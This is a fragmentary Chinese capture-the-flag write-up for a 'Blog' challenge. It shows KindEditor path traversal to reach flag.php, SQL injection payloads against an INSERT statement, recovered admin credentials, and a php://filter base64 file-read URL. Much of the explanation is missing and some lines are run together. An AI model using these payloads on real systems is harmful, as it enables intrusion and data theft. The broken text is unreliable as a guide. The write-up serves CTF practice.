i春秋Blog

匿名 (未验证) 提交于 2019-12-03 00:03:02

hello world

然后有注册有登录

不多说我们直接注册登录试试

POST

 

 

没什么重要的回显

再上传一个文档试试

 

 

kindeditor

kindeditorhttps://www.jb51.net/hack/367946.html

url/kindeditor/php/file_manager_json.php

?path=

/kindeditor/php/file_manager_json.php?path=/

 

 

有回显,成功了

再通过

?path=../

?path=../../

?path=../../../

来访问一层层的文件夹

flag.php

 

 

url/kindeditor/php/file_manager_json.php?path=../../flag.php    

url/flag.php

 

 

...............

flag

尝试在上传输入框中进行注入

1' or '1'='1

1' or '1'='0

发现回显不一样,肯定存在注入了就

 

 

 

 

unionselect

dalao

sql:INSERT INTO TABLENAME(A,B,C) VALUES($A,$B,$C);

A,B,C

insert into tableA values(A1,B1,C1), (A2,B2,C2) tableA

insert... values('aaa','testpayload2','test')#

test')#

 

 

爆错

insertinsert4

test','X')#

没有报错

 

 

test','X'),('123',(SELECT database()),'content

payloadXinsertinsertdatabase()   select

 

select

userpassword

adminmelody123

manage

url

 

 

php://filterflag.php

http://2ec1ede328db494eb0dbf2567855db9fbb9db7d06a2040f4.changame.ichunqiu.com/blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&name=php

 

 

base64

flag

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!